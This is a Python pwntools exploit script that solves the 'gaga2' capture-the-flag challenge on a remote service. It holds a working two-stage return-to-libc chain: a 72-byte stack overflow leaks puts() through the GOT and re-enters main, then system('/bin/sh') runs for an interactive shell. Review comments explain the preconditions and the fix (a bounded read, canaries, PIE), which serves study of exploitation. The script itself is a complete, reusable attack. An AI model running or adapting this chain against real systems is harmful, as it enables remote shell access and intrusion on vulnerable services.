from pwn import *
# Two-stage return-to-libc script for the 'gaga2' CTF binary, written with pwntools.
# Stage 1 overwrites the saved return address to print the run-time address of
# puts() and re-enter main(); stage 2 uses that leak to call system("/bin/sh").
#
# NOTE(review): what this script relies on, read from the lines below (confirm
# against the binary with a tool such as checksec):
#   - an unbounded read into a stack buffer (72 filler bytes precede the chain),
#   - no stack canary in the overflowed function, since nothing is leaked or
#     preserved between the filler and the return address,
#   - a non-PIE executable, since gadget addresses are hard-coded constants.
# The root-cause fix is a length-bounded read. Stack protectors and PIE each
# remove one of these preconditions. libc ASLR alone does not, because stage 1
# turns the overflow into an address leak.

# Connect to the remote challenge service.
r = remote("challs.actf.co", 31302)
# Local alternative to the remote connection, left disabled by the author.
#r = process("./gaga2")
# Parse the target binary so its PLT/GOT entries and symbols can be looked up by name.
elf = ELF('./gaga2')
# Parse a local libc 2.31 for symbol offsets.
# NOTE(review): assumes the service runs this exact libc build; otherwise the
# offsets used below are wrong - confirm.
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')
# Reset pwntools' global context. arch controls how flat()/u64() pack integers
# (64-bit here), and log_level="debug" dumps all traffic to the terminal.
context.clear(os = "linux", arch='x86_64', log_level="debug")
# Discard whatever the service prints first (presumably a banner/prompt).
r.recv()
# Hard-coded addresses inside the executable.
# NOTE(review): by their names these should be a `pop rdi; ret` gadget and a
# bare `ret`; the disassembly is not shown here - verify.
pop_rdi = 0x00000000004012b3
ret = 0x000000000040101a
# Stage 1: 72 filler bytes (presumably buffer + saved rbp), then a chain that
# loads the address of puts' GOT entry into rdi, calls puts via its PLT stub so
# the resolved libc address is printed, and returns into main() to get a second
# chance to send input.
payload = flat(b'A' * 72,pop_rdi,elf.got['puts'],elf.plt['puts'],elf.symbols["main"],)
r.sendline(payload)
# Read the leaked pointer: 6 bytes zero-padded to 8 and unpacked as a 64-bit
# little-endian integer. recv(6) returns *at most* 6 bytes, so a short read
# makes u64() raise instead of yielding an address.
puts_leak = u64(r.recv(6) + b'\x00\x00')
# Rebase the local libc object; libc.sym / libc.search below now return
# run-time addresses rather than file offsets.
libc.address = (puts_leak - libc.sym["puts"])
# Stage 2: same 72-byte filler, then ret, pop_rdi with the address of the
# "/bin/sh" string found inside libc, then system().
# NOTE(review): the leading `ret` is presumably there to keep the stack 16-byte
# aligned when system() is entered - confirm.
payload = flat(b"A" * 72,ret,pop_rdi,next(libc.search(b"/bin/sh")),libc.sym["system"])
r.sendline(payload)
# Hand the connection over to the terminal.
r.interactive()